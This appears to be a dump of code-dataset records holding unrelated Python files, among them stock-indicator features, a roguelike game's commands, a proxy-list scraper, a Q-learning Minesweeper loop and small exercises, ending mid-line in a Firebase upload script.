diff.clip(lower=0).ewm(alpha=1/RSI_period).mean()\n negative = diff.clip(upper=0).ewm(alpha=1/RSI_period).mean()\n df['RSI' + str(i)] = 100 - 100 / (1 - positive / negative)\n\n ## HLband\n for i in [3, 7, 20, 40]:\n period = i*60//tick*24\n Hline = df.close.rolling(period).max()\n Lline = df.close.rolling(period).min()\n df['Hline_diff_percent_' + str(i)] = (Hline - df['close']) / df['close']\n df['Lline_diff_percent_' + str(i)] = (Lline - df['close']) / df['close']\n\n df.fillna(0, inplace=True)\n\n ## Stochastics\n Kperiod = 14*60//tick*24 # %K\n Dperiod = 3*60//tick*24 # %D\n Slowing = 3*60//tick*24\n Hline = df.high.rolling(Kperiod).max()\n Lline = df.low.rolling(Kperiod).min()\n sumlow = (df.close - Lline).rolling(Slowing).sum()\n sumhigh = (Hline - Lline).rolling(Slowing).sum()\n df['Stoch_day'] = sumlow / sumhigh * 100\n df['StochSignal_day'] = df['Stoch_day'].rolling(Dperiod).mean()\n df.fillna(0, inplace=True)\n\n #################### VIX / Ichimoku\n\n # VIX\n import collections\n def vixfix(close, low, high, period=22, bbl=20, mult=2.0, lb=50, ph=0.85, pl=1.01):\n period = period # LookBack Period Standard Deviation High\n bbl = bbl # Bollinger Band Length\n mult = mult # Bollinger Band Standard Deviation Up\n lb = lb # Look Back Period Percentile High\n ph = ph # Highest Percentile - 0.90=90%, 0.95=95%, 0.99=99%\n pl = pl # Lowest Percentile - 1.10=90%, 1.05=95%, 1.01=99%\n hp = False # Show High Range - Based on Percentile and LookBack Period?\n sd = False # Show Standard Deviation Line?\n # VixFix\n wvf = (close.rolling(period, 1).max() - low) / close.rolling(period, 1).max() * 100\n # VixFix_inverse\n wvf_inv = abs((close.rolling(period, 1).min() - high) / close.rolling(period, 1).min() * 100)\n sDev = mult * pd.Series(wvf).rolling(bbl, 1).std()\n midLine = pd.Series(wvf).rolling(bbl, 1).mean()\n lowerBand = midLine - sDev\n upperBand = midLine + sDev\n rangeHigh = pd.Series(wvf).rolling(lb, 1).max() * ph\n rangeLow = pd.Series(wvf).rolling(lb, 1).min() * pl\n result = collections.namedtuple('result', 'wvf, wvf_inv, lowerBand, upperBand, rangeHigh,rangeLow')\n return result(wvf=wvf, wvf_inv=wvf_inv, lowerBand=lowerBand, upperBand=upperBand,\n rangeHigh=rangeHigh, rangeLow=rangeLow)\n\n vix = vixfix(close=df.close, low=df.low, high=df.high)\n df['vix_wvf'] = vix.wvf\n df['vix_wvf_inv'] = vix.wvf_inv\n\n # Ichimoku\n band9_period = 9*24*60*60 // tick_seconds\n Hline9 = df.close.rolling(band9_period).max()\n Lline9 = df.close.rolling(band9_period).min()\n change_line = ( Hline9 + Lline9 ) / 2\n\n band26_period = 26*24*60*60 // tick_seconds\n Hline26 = df.close.rolling(band26_period).max()\n Lline26 = df.close.rolling(band26_period).min()\n standart_line = ( Hline26 + Lline26 ) / 2\n\n span1_line = (change_line + standart_line) / 2\n\n band52_period = 52*24*60*60 // tick_seconds\n Hline52 = df.close.rolling(band52_period).max()\n Lline52 = df.close.rolling(band52_period).min()\n span2_line = ( Hline52 + Lline52 ) / 2\n\n df['Ichimoku_change_line_diff_percent'] = (change_line - df['close']) / df['close']\n df['Ichimoku_standart_line_diff_percent'] = (standart_line - df['close']) / df['close']\n df['Ichimoku_span1_line_diff_percent'] = (span1_line - df['close']) / df['close']\n df['Ichimoku_span2_line_diff_percent'] = (span2_line - df['close']) / df['close']\n\n #################### TA-Lib params (Volatility)\n df['NATR_1day'] = ta.NATR(high, low, close, timeperiod=14*60//tick*24)\n for i in [1, 2]:\n new_column_name = 'NATR_' + str(i) + 'days_before_diff'\n df[new_column_name] = 
df['NATR_1day'] - df['NATR_1day'].shift(i*60//tick*24)\n\n #################### TA-Lib params (Mom系)\n adxr = ta.ADXR(high, low, close, timeperiod=14*60//tick*24)\n adx = ta.ADX(high, low, close, timeperiod=14*60//tick*24)\n df['ADX_ADXR_diff'] = adx - adxr\n\n #################### TA-Lib params (Other)\n df['HT_SINE'], df['leadsine'] = ta.HT_SINE(close)\n df['BETA'] = ta.BETA(high, low, timeperiod=5*60//tick*24)\n df['CORREL'] = ta.CORREL(high, low, timeperiod=30*60//tick*24)\n\n #################### RCI\n def ord(seq, idx, itv):\n p = seq[idx]\n o = 1\n for i in range(0, itv):\n if p < seq[i]:\n o = o + 1\n return o\n\n def d(itv, src):\n sum = 0.0\n for i in range(0, itv):\n sum = sum + pow((i + 1) - ord(src, i, itv), 2)\n return sum\n\n def calc_rci(itv, src):\n rciM = (1.0 - 6.0 * d(itv,src) / (itv * (itv * itv - 1.0))) * 100.0\n return rciM\n\n def get_rci(period_rci, close):\n rank_period = np.arange(period_rci, 0, -1)\n close_len = len(close)\n rci = np.zeros(close_len)\n for i in range(close_len - period_rci + 1):\n rci[-i-1] = calc_rci(period_rci, close[close_len - period_rci - i : close_len - i])\n return rci\n\n for period in [9, 36]:\n df['RCI_' + str(period)] = get_rci(period, df.close.tolist())\n\n df.replace([np.inf, -np.inf], np.nan, inplace=True)\n df.fillna(0, inplace=True)\n\n return df\n\n\ndef calc_flag(df, delay, flag_threshold):\n def check_change(changeHigh_series, changeLow_series):\n change = []\n changeHigh, changeLow = changeHigh_series.tolist(), changeLow_series.tolist()\n for i in range(len(changeHigh)):\n if changeHigh[i] >= (1 + flag_threshold) and \\\n changeLow[i] < (1 - flag_threshold):\n if (changeHigh[i] - 1) >= (1 - changeLow[i]):\n change.append(2)\n else:\n change.append(1)\n elif changeHigh[i] >= (1 + flag_threshold):\n change.append(2)\n elif changeLow[i] < (1 - flag_threshold):\n change.append(1)\n else:\n change.append(0)\n return change\n\n rollingHigh = df.high.rolling(window=delay).max()\n rollingLow = df.low.rolling(window=delay).min()\n changeHigh = rollingHigh.shift(-1*delay)\n changeLow = rollingLow.shift(-1*delay)\n changeHigh /= df['close']\n changeLow /= df['close']\n\n df['flag'] = check_change(changeHigh, changeLow)\n df.dropna(inplace=True)\n return df\n\n\ndef fix_error_row(df):\n df.drop(df[df['low'] < 20].index, axis=0, inplace=True)\n return df\n","sub_path":"src/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":13426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"177932997","text":"import regex as re\n\nfrom typing import List\n\nfrom pycode2seq.inference.common.node import Node\n\n\nTECHNICAL_TOKEN_KEY = \"technical_token\"\nDEFAULT_TOKEN = \"EMPTY_TOKEN\"\n\n\ndef do_traverse_pre_order(node: Node, result: List[Node]):\n result.append(node)\n for child in node.children:\n do_traverse_pre_order(child, result)\n\n\ndef pre_order(root: Node) -> List[Node]:\n result = []\n do_traverse_pre_order(root, result)\n return result\n\n\ndef set_node_technical_token(node: Node, token: str):\n node.metadata[TECHNICAL_TOKEN_KEY] = token\n\n\ndef normalize_token(token: str, default: str) -> str:\n clean_token = re.sub(\"\\\\P{Print}\", \"\", re.sub(\"[\\\"',]\", \"\", re.sub(\"//s+\", \"\", re.sub(\"\\\\\\\\n\", \"\", token.lower()))))\n\n stripped = re.sub(\"[^A-Za-z]\", \"\", clean_token)\n\n if not stripped:\n careful_stripped = clean_token.replace(\" \", \"_\")\n if not careful_stripped:\n return default\n return careful_stripped\n\n return 
stripped\n\n\ndef split_to_subtokens(token: str) -> List[str]:\n splitted = re.split(\"(?<=[a-z])(?=[A-Z])|_|[0-9]|(?<=[A-Z])(?=[A-Z][a-z])|\\\\s+\", token.strip())\n return [normalize_token(token, \"\") for token in splitted if token]\n","sub_path":"pycode2seq/inference/common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"278092976","text":"from __future__ import annotations\n\nimport os\nfrom threading import Timer\nfrom typing import List\n\nimport snecs\nfrom snecs import Component\n\nfrom scripts.engine import chronicle, state, utility, world\nfrom scripts.engine.component import Aesthetic, Position, WinCondition\nfrom scripts.engine.core.constants import ASSET_PATH, SAVE_PATH, GameState, RenderLayer, UIElement\nfrom scripts.engine.core.data import store\nfrom scripts.engine.core.definitions import ActorData, TraitSpritePathsData\nfrom scripts.engine.systems import vision\nfrom scripts.engine.ui.manager import ui\nfrom scripts.engine.world_objects.game_map import GameMap\n\n__all__ = [\"initialise_game\", \"goto_character_select\", \"load_game\", \"exit_game\", \"win_game\"]\n\n\ndef initialise_game():\n \"\"\"\n Init the game`s required info\n \"\"\"\n state.set_new(GameState.MENU)\n ui.set_element_visibility(UIElement.TITLE_SCREEN, True)\n\n\ndef goto_character_select():\n \"\"\"\n Create a new game\n \"\"\"\n ui.set_element_visibility(UIElement.CHARACTER_SELECTOR, True)\n\n\ndef start_game(player_data: ActorData):\n \"\"\"\n Create a new game and show the gamemap\n \"\"\"\n # create clean snecs.world\n empty_world = snecs.World()\n world.move_world(empty_world)\n\n # init and save map\n game_map = GameMap(\"cave\", 10)\n store.current_game_map = game_map\n\n # populate the map\n game_map.generate_new_map(player_data)\n\n # init the player\n player = world.get_player()\n\n # create win condition and place next to player\n player_pos = world.get_entitys_component(player, Position)\n win_x = player_pos.x + 1\n win_y = player_pos.y\n components: List[Component] = []\n components.append(Position((win_x, win_y))) # lets hope this doesnt spawn in a wall\n components.append(WinCondition())\n traits_paths = [TraitSpritePathsData(idle=str(ASSET_PATH / \"world/win_flag.png\"))]\n sprites = utility.build_sprites_from_paths(traits_paths)\n components.append(Aesthetic(sprites.idle, sprites, traits_paths, RenderLayer.ACTOR, (win_x, win_y)))\n world.create_entity(components)\n\n # tell places about the player\n chronicle.set_turn_holder(player)\n\n # create a god\n world.create_god(\"the_small_gods\")\n\n # show the in game screens\n ui.set_element_visibility(UIElement.CAMERA, True)\n ui.set_element_visibility(UIElement.MESSAGE_LOG, True)\n ui.set_element_visibility(UIElement.SKILL_BAR, True)\n\n # welcome message\n ui.create_screen_message(\"Welcome to Not Quite Paradise\")\n\n # FIXME - entities load before camera so they cant get their screen position.\n # If ui loads before entities then it fails due to player not existing. 
Below is a hacky fix.\n for entity, (aesthetic, position) in world.get_components([Aesthetic, Position]):\n assert isinstance(aesthetic, Aesthetic)\n assert isinstance(position, Position)\n aesthetic.draw_x, aesthetic.draw_y = (position.x, position.y)\n aesthetic.target_draw_x = aesthetic.draw_x\n aesthetic.target_draw_y = aesthetic.draw_y\n\n # entities load with a blank fov, update them now\n vision.process_light_map()\n vision.process_fov()\n vision.process_tile_visibility()\n\n # point the camera at the player, now that FOV is updated\n pos = world.get_entitys_component(player, Position)\n camera = ui.get_element(UIElement.CAMERA)\n camera.set_target((pos.x, pos.y), True)\n\n # loading finished, give player control\n state.set_new(GameState.GAMEMAP)\n\n # prompt turn actions\n chronicle.end_turn(player, 0)\n\n\ndef load_game():\n \"\"\"\n Load existing game state\n \"\"\"\n full_save_path = str(SAVE_PATH)\n for save_name in os.listdir(full_save_path):\n save = save_name.replace(\".json\", \"\")\n state.load_game(save)\n break\n\n # show the in game screens\n ui.set_element_visibility(UIElement.CAMERA, True)\n ui.set_element_visibility(UIElement.MESSAGE_LOG, True)\n ui.set_element_visibility(UIElement.SKILL_BAR, True)\n\n # welcome message\n ui.create_screen_message(\"Welcome back to Not Quite Paradise\")\n\n # loading finished, give player control\n state.set_new(GameState.GAMEMAP)\n\n\ndef exit_game():\n \"\"\"\n Exit the game\n \"\"\"\n state.set_new(GameState.EXITING)\n\n\ndef quit_to_title():\n \"\"\"\n Quit out of the game back to the title screen\n \"\"\"\n state.set_new(GameState.MENU)\n\n # hide the in game screens\n ui.set_element_visibility(UIElement.CAMERA, False)\n ui.set_element_visibility(UIElement.MESSAGE_LOG, False)\n ui.set_element_visibility(UIElement.SKILL_BAR, False)\n\n # show the title screen\n ui.set_element_visibility(UIElement.TITLE_SCREEN, True)\n\n\ndef win_game():\n \"\"\"\n Trigger the win game actions\n \"\"\"\n state.set_new(GameState.MENU)\n ui.create_screen_message(\"You wonned. 
Huzzah.\")\n\n # quit to main menu after a few seconds\n timer = Timer(2.0, quit_to_title)\n timer.start()\n","sub_path":"scripts/nqp/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"327711055","text":"# (Alphabet number * key)mod(total number of alphabets)\n\nASC_A = 40\nWIDTH = 26\n\ndef unshift(key, ch):\n offset = ord(ch) - ASC_A\n return chr(((key[0] * (offset + key[1])) % WIDTH) + ASC_A)\n\nkey = 7\n\nprint(\"Multiplicative Cipher is\")\nprint(unshift(key, 'A'))\n","sub_path":"multiplicativeCipher.py","file_name":"multiplicativeCipher.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"324868551","text":"#!/usr/bin/env python3\nimport time\nfrom random import randint\nimport qLearnAgent\nimport pygame\nimport gui\nimport state\n\ngui_board = gui.MineSweeperGui(None)\n\n# gui_board.show()\n# gui_board.update()\nprint(\" start \")\nfinish = False\nmyAgent = qLearnAgent.QLearnAgent()\nis_run =True\nspeed = 1.0\n\nwhile True:\n speed_scale = 1.0\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n is_run,speed_scale = gui_board.mouseDown(pygame.mouse.get_pos())\n if not is_run:\n continue\n if speed/speed_scale != 0:\n speed = speed/speed_scale\n gui_board.speed =speed\n time.sleep(speed)\n x, y = myAgent.choose_action(gui_board.game_map)\n action_tuple = (x, y)\n last_map_id = state.get_id_from_map(gui_board.game_map)\n res, reward = gui_board.select_tile(action_tuple)\n next_state_id = state.get_id_from_map(gui_board.game_map)\n new_value = myAgent.update_q_value(last_state_id=last_map_id, action=action_tuple,\n next_state_id=next_state_id, reward=reward,next_map=gui_board.game_map)\n\n if res == -1:\n time.sleep(speed/10)\n gui_board.restart_game()\n finish = True\n elif res == 2:\n gui_board.restart_game()\n finish = True\n # time.sleep(5)\n gui_board.update_q_value(myAgent.q_matrix[next_state_id])\n","sub_path":"Codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"505115163","text":"import os\nfrom mako.template import Template\n\n\nclass UserCreateResource:\n def on_get(self, req, resp):\n \"\"\"Handles GET requests\"\"\"\n\n resp.content_type = 'text/html'\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n user_create_template = Template(\n filename=dir_path + '/user_create_view.mako')\n resp.body = user_create_template.render()\n","sub_path":"pom_tracker/views/user_create.py","file_name":"user_create.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"225400757","text":"\"\"\"Common test tools.\"\"\"\nfrom datetime import timedelta\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom openpeerpower.components import rfxtrx\nfrom openpeerpower.components.rfxtrx import DOMAIN\nfrom openpeerpower.util.dt import utcnow\n\nfrom tests.common import MockConfigEntry, async_fire_time_changed\nfrom tests.components.light.conftest import mock_light_profiles # noqa: F401\n\n\ndef create_rfx_test_cfg(device=\"abcd\", automatic_add=False, devices=None):\n \"\"\"Create rfxtrx config entry data.\"\"\"\n return {\n \"device\": device,\n \"host\": None,\n 
\"port\": None,\n \"automatic_add\": automatic_add,\n \"debug\": False,\n \"devices\": devices,\n }\n\n\n@pytest.fixture(autouse=True, name=\"rfxtrx\")\nasync def rfxtrx_fixture(opp):\n \"\"\"Fixture that cleans up threads from integration.\"\"\"\n\n with patch(\"RFXtrx.Connect\") as connect, patch(\"RFXtrx.DummyTransport2\"):\n rfx = connect.return_value\n\n async def _signal_event(packet_id):\n event = rfxtrx.get_rfx_object(packet_id)\n await opp.async_add_executor_job(\n rfx.event_callback,\n event,\n )\n\n await opp.async_block_till_done()\n await opp.async_block_till_done()\n return event\n\n rfx.signal = _signal_event\n\n yield rfx\n\n\n@pytest.fixture(name=\"rfxtrx_automatic\")\nasync def rfxtrx_automatic_fixture(opp, rfxtrx):\n \"\"\"Fixture that starts up with automatic additions.\"\"\"\n entry_data = create_rfx_test_cfg(automatic_add=True, devices={})\n mock_entry = MockConfigEntry(domain=\"rfxtrx\", unique_id=DOMAIN, data=entry_data)\n\n mock_entry.add_to_opp(opp)\n\n await opp.config_entries.async_setup(mock_entry.entry_id)\n await opp.async_block_till_done()\n await opp.async_start()\n yield rfxtrx\n\n\n@pytest.fixture\nasync def timestep(opp):\n \"\"\"Step system time forward.\"\"\"\n\n with patch(\"openpeerpower.core.dt_util.utcnow\") as mock_utcnow:\n mock_utcnow.return_value = utcnow()\n\n async def delay(seconds):\n \"\"\"Trigger delay in system.\"\"\"\n mock_utcnow.return_value += timedelta(seconds=seconds)\n async_fire_time_changed(opp, mock_utcnow.return_value)\n await opp.async_block_till_done()\n\n yield delay\n","sub_path":"tests/components/rfxtrx/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"508336359","text":"from django.db import models\nfrom django.utils.translation import ugettext as _\n\n\nclass AdSource(models.TextChoices):\n OLX = 'olx', _('olx.uz')\n AVTOELON = 'avtoelon', _('avtoelon.uz')\n\n\nclass TransmissionType(models.TextChoices):\n AUTOMATIC = 'automatic', _('Автоматическая')\n MANUAL = 'manual', _('Механическая')\n OTHER = 'other', _('Другая')\n\n\nclass VehicleCondition(models.TextChoices):\n PERFECT = 'perfect', _('Отличное')\n GOOD = 'good', _('Хорошее')\n MEDIOCRE = 'mediocre', _('Среднее')\n NEEDS_REPAIRS = 'needs_repairs', _('Требует ремонта')\n","sub_path":"apps/vehicle/enums.py","file_name":"enums.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"352591054","text":"N = int(input())\nblue = 0\nred = 0\nfor _ in range(N):\n S = input()\n for s in S:\n if s == 'R':\n red += 1\n elif s == 'B':\n blue += 1\n\nif blue < red:\n print('TAKAHASHI')\nelif red < blue:\n print('AOKI')\nelse:\n print('DRAW')\n","sub_path":"AtCoder/arc/040a.py","file_name":"040a.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"469175318","text":"# A utility class that represents an individual node in a Binary Search Tree\nclass Node: \n def __init__(self,key): \n self.left = None\n self.right = None\n self.val = key \n\n\n\n\n\"\"\"\n(a) Inorder (Left, Root, Right) : 4 2 5 1 3\n(b) Preorder (Root, Left, Right) : 1 2 4 5 3\n(c) Postorder (Left, Right, Root) : 4 5 2 3 1\n\"\"\"\n\n\n# Binary Search Tree Find with the give value to search for\ndef search(root,key): \n\t\n\t# Base Cases: root is null or key is present at root \n\tif root is 
None or root.val == key: \n\t\treturn root \n\n\t# Key is greater than root's key \n\tif root.val < key: \n\t\treturn search(root.right,key) \n\t\n\t# Key is smaller than root's key \n\treturn search(root.left,key) \n\n\n# A utility function to insert a new node with the given key \ndef insert(root,node): \n\tif root is None: \n\t\troot = node \n\telse: \n\t\tif root.val < node.val: \n\t\t\tif root.right is None: \n\t\t\t\troot.right = node \n\t\t\telse: \n\t\t\t\tinsert(root.right, node) \n\t\telse: \n\t\t\tif root.left is None: \n\t\t\t\troot.left = node \n\t\t\telse: \n\t\t\t\tinsert(root.left, node) \n\n\n\n","sub_path":"algorithms/bs_tree.py","file_name":"bs_tree.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"89250721","text":"\n# os.walk()的使用\nimport os\n\n# 枚举dirPath目录下的所有文件\n\ndef main():\n#begin\n\tfileDir = \"F:\" + os.sep + \"aaa\"\t\t# 查找F:\\aaa 目录下\t\n\tfor root, dirs, files in os.walk(fileDir):\n\t#begin\n\t\tfor dir in dirs:\n\t\t#begin\n\t\t\tprint(os.path.join(root, dir))\n\t\t#end\n\t\tfor file in files:\n\t\t#begin\n\t\t\tprint(os.path.join(root, file))\n\t\t#end\n\t#end\n\tos.system(\"pause\")\n#end\n\nif __name__ == '__main__':\n#begin\n\tmain()\n#end\n\n\n# 输出\n# F:\\aaa\\4\n# F:\\aaa\\1.txt\n# F:\\aaa\\2.txt\n# F:\\aaa\\3.txt\n# F:\\aaa\\4\\5.txt\n# F:\\aaa\\4\\6.txt\n# F:\\aaa\\4\\7.txt\n","sub_path":"fanli/327/327.py","file_name":"327.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"92763315","text":"# -*- coding: utf-8 -*-\n# Author: wz\nimport re\nimport base64\n\n'''\n在这个文件中配置爬取网站的具体规则\n并且将参数组装成字典的形式在GetProxy.py中调用\n'''\n\n\ndef get_proxy_from_xicidaili(mysql, tree):\n if tree is not None:\n # 第一行是表头\n trs = tree.xpath('//table/tr[position()>1]')\n for tr in trs:\n ip = tr[1].text\n # 先判断该ip是否已经存储过\n if not mysql.has_saved(ip):\n port = tr[2].text\n type = tr[5].text.lower()\n proxy_dict = {\n 'ip': ip,\n 'port': port,\n 'type': type,\n }\n # print(ip_dict)\n mysql.save_proxy(proxy_dict)\n\n\ndef get_proxy_from_ip3366(mysql, tree):\n if tree is not None:\n trs = tree.xpath('//tbody/tr')\n for tr in trs:\n # tr[0]:ip,tr[1]:端口,tr[3]:类型\n ip = tr[0].text\n if not mysql.has_saved(ip):\n port = tr[1].text\n # print(tr[1].__class__)\n type = tr[3].text.lower()\n proxy_dict = {\n 'ip': ip,\n 'port': port,\n 'type': type\n }\n mysql.save_proxy(proxy_dict)\n\n\ndef get_proxy_from_ip181(mysql, tree):\n if tree is not None:\n # 首行是表头\n trs = tree.xpath('//tbody//tr[position()>1]')\n for tr in trs:\n ip = tr[0].text\n if not mysql.has_saved(ip):\n port = tr[1].text\n type = 'https' if 'HTTPS' in tr[3].text else 'http'\n proxy_dict = {\n 'ip': ip,\n 'port': port,\n 'type': type\n }\n mysql.save_proxy(proxy_dict)\n\n\ndef get_proxy_from_proxydb(mysql, tree):\n if tree is not None:\n trs = tree.xpath('//tbody/tr')\n for tr in trs:\n # 不保存socks5,socks4类型的ip\n type = tr[4].text.strip().lower()\n if type in ['socks5', 'socks4']:\n break\n # 原网页是通过js得出的ip地址,所以需要进行转换\n # 获得原本的script语句\n script = tr[0].findtext('script')\n # 正则表达式匹配到需要的内容\n pattern = re.compile(r\".*?var \\w = '(.*?)'.*?var yy = atob\\('(.*?)'.*?var pp = (.*?) 
-1\", re.S)\n # match[0]:ip前部分,match[1]:ip后部分,match[3]:表达式,计算后是port\n match = re.findall(pattern, script)[0]\n # print(match[1].encode().decode('unicode-escape'))\n footer = match[1].encode().decode('unicode-escape')\n ip = (match[0])[::-1] + base64.b64decode(footer).decode()\n\n if not mysql.has_saved(ip):\n port = str(eval(match[2]))\n # print(type, ip, port)\n proxy_dict = {\n 'type': type,\n 'ip': ip,\n 'port': port\n }\n mysql.save_proxy(proxy_dict)\n\n\ndef get_proxy_from_swei360(mysql, tree):\n if tree is not None:\n trs = tree.xpath('//tbody/tr')\n for tr in trs:\n # tr[0]:ip,tr[1]:端口,tr[3]:类型\n ip = tr[0].text\n if not mysql.has_saved(ip):\n port = tr[1].text\n # print(tr[1].__class__)\n type = tr[3].text.lower()\n proxy_dict = {\n 'ip': ip,\n 'port': port,\n 'type': type\n }\n mysql.save_proxy(proxy_dict)\n\n\n'''\n字段属性说明\nname:网站名称\nurls:网址\nmethod:爬取该网站的具体方法\n'''\nxicidaili = {\n 'name': 'xicidaili',\n # map()返回一个map对象,可用for遍历,但是map对象是一次性的,遍历一次后就空了。所以最好还是用列表解析的方式来代替map()\n # 'urls': list(map(lambda x: 'http://www.xicidaili.com/nn/'+str(x), range(1, 3))),\n 'urls': ['http://www.xicidaili.com/nn/'+str(x) for x in range(1, 3)],\n 'method': get_proxy_from_xicidaili,\n}\n\nip3366 = {\n 'name': 'ip3366',\n # 'urls': list(map(lambda x: 'http://www.ip3366.net/?stype=1&page='+str(x), range(1, 6))),\n 'urls': ['http://www.ip3366.net/?stype=1&page='+str(x) for x in range(1, 6)],\n 'method': get_proxy_from_ip3366,\n}\n\nip181 = {\n 'name': 'ip181',\n 'urls': ['http://www.ip181.com/'],\n 'method': get_proxy_from_ip181,\n}\n\nproxydb = {\n 'name': 'proxydb',\n # 'urls': list(map(lambda x: 'http://proxydb.net/?country=CN&offset='+str(x), range(0, 250, 15))),\n 'urls': ['http://proxydb.net/?country=CN&offset='+str(x) for x in range(0, 255, 15)],\n 'method': get_proxy_from_proxydb,\n}\n\nswei360 = {\n 'name': 'swei360',\n # 'urls': list(map(lambda x: 'http://www.ip3366.net/?stype=1&page='+str(x), range(1, 6))),\n 'urls': ['http://www.swei360.com/free/?page='+str(x) for x in range(1, 8)],\n 'method': get_proxy_from_swei360,\n}\n\ntargets = [xicidaili, ip3366, ip181, proxydb, swei360]\n\n","sub_path":"Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"81412025","text":"import numpy as np\nimport torch\n\n# SET PATHS\n\nPATH_DATABASE = \"database/\"\nPATH_DATA = \"data/\"\nPATH_PLOTS = \"analysis/plots/\"\nPATH_LOGS = \"analysis/logs/\"\n\n# DECAY IDENTIFICATION\n\nANALYSIS_ID = \"CMS-PAS-SUS-12-026\"\nTXNAME = \"T1tttt\"\nMOTHER_LOW = 600\nMOTHER_UP = 1100\nMOTHER_STEP = 5\nLSP_LOW = 0\nLSP_STEP = 10\n\n# SPLIT INFORMATION\n\nSPLIT_CHOOSE = 1 #1 for split, 0 for no split\nSPLIT = [80, 10, 10] #train/val/test\n\nLEN_TEST_SET\t \t= 0\nLEN_TRAINING_SET \t= 0\nLEN_VALIDATION_SET \t= 0\n\n############\n\n# PICK RESULT\n\nEXP = \"CMS-PAS-SUS-12-026\"\nTX = \"T1tttt\"\n\n############\n\n# CONFIGURE PYTORCH\n\nCUDA = torch.cuda.is_available()\nMINI_BATCH_SIZE = 32\nDIM_IN = 2\nDIM_HIDDEN_1 = 4\nDIM_HIDDEN_2 = 16\nDIM_HIDDEN_3 = 4\nDIM_OUT = 1\nBATCH_SIZE_VAL = 59\nEPOCH_NUM = 200\nANALYSIS_SAMPLE_SIZE = 100\nHYPERLOSS_FUNCTION = \"lin\" #\"lin\", \"exp\"\n\n############\n\n# HYPERPARAMETERS\n\nINT_LOSS = 4\nINT_LOSS_SQ = 20\nHID_LAY_MAX = 2\nHID_LAY_MIN = 1\nHID_LAY_STEP = 1\nHID_LAY = range(HID_LAY_MIN,HID_LAY_MAX+1,HID_LAY_STEP)\nNOD_MAX = 16\nNOD_MIN = 12\nNOD_STEP = 4\nNOD = range(NOD_MIN, NOD_MAX+1,NOD_STEP)\nLR_MIN = 1e-3\nLR_MAX = 1.0001e-3\nLR_STEP = 9e-3\nLEARN_RATE = 
np.arange(LR_MIN, LR_MAX, LR_STEP)\nLOSS_FUNCTIONS = [\"MSE\"] #[\"MSE\"]\nOPTIMIZERS = [\"Adam\"] #[\"Adam\"]\nMINIBATCH_SIZES = [32]\nACTIVATION_FUNCTIONS = [\"rel\"]#, \"sig\", \"tah\"]\nSHAPES = [\"lin\"]#,\"trap\",\"ramp\"]\n#netdata = {}\n","sub_path":"system/glovar.py","file_name":"glovar.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"586121700","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTechnical-analysis stock screening TYPE 10, upload to Firebase\n\n@author: Bryson Xue\n\n@target_url: \n\n@Note: \n\tUpload the stock-selection results to Firebase\n\n\"\"\"\nimport datetime\nfrom dateutil import parser\nimport pandas as pd\nimport xlrd\nimport sys, os\nfrom firebase import firebase\n\ndef MAIN_STOCK_SELECT_TYPE10_FB():\n\tprint(\"Executing \" + os.path.basename(__file__) + \"...\")\n\n\tdt=datetime.datetime.now()\n\tstr_date = parser.parse(str(dt)).strftime(\"%Y%m%d\")\n\texl_name = \"STOCK_SELECT_TYPE10_\" + str_date + \".xlsx\"\n\n\ttry:\n\t\twb = xlrd.open_workbook(exl_name, on_demand = True)\n\texcept Exception as e:\n\t\tprint('Err: 讀取 ' + exl_name + ' 選股excel檔異常.')\n\t\tprint(e.args)\n\t\treturn\n\n\tsh = wb.sheet_by_index(0)\n\trow_cnt = sh.nrows\n\n\tna_flag = False\n\t#print(sh.cell(0,0).value)\n\tif sh.cell(0,0).value == '今日無符合條件之股票.':\n\t\tna_flag = True\n\n\trow_ls = []\n\tif na_flag == False:\n\t\tfor i in range(1,row_cnt):\n\t\t\td = {}\n\t\t\t#print(i)\n\t\t\td['股票代號'] = sh.cell(i,0).value.replace('.TW','')\n\t\t\td['名稱'] = sh.cell(i,1).value\n\t\t\td['外資買賣超天數'] = sh.cell(i,4).value\n\t\t\td['投信買賣超天數'] = sh.cell(i,5).value\n\t\t\td['自營商買賣超天數'] = sh.cell(i,6).value\n\t\t\td['類別'] = sh.cell(i,7).value\n\t\t\t#print(d)\n\t\t\trow_ls.append(d)\n\n\t# close the Excel file\n\twb.release_resources()\n\tdel wb\n\n\t#print(row_ls)\n\t\n\ttry:\n\t\t# open the Firebase connection\n\t\tdb_url = 'https://brysonxue-bfca6.firebaseio.com/'\n\t\tfdb = 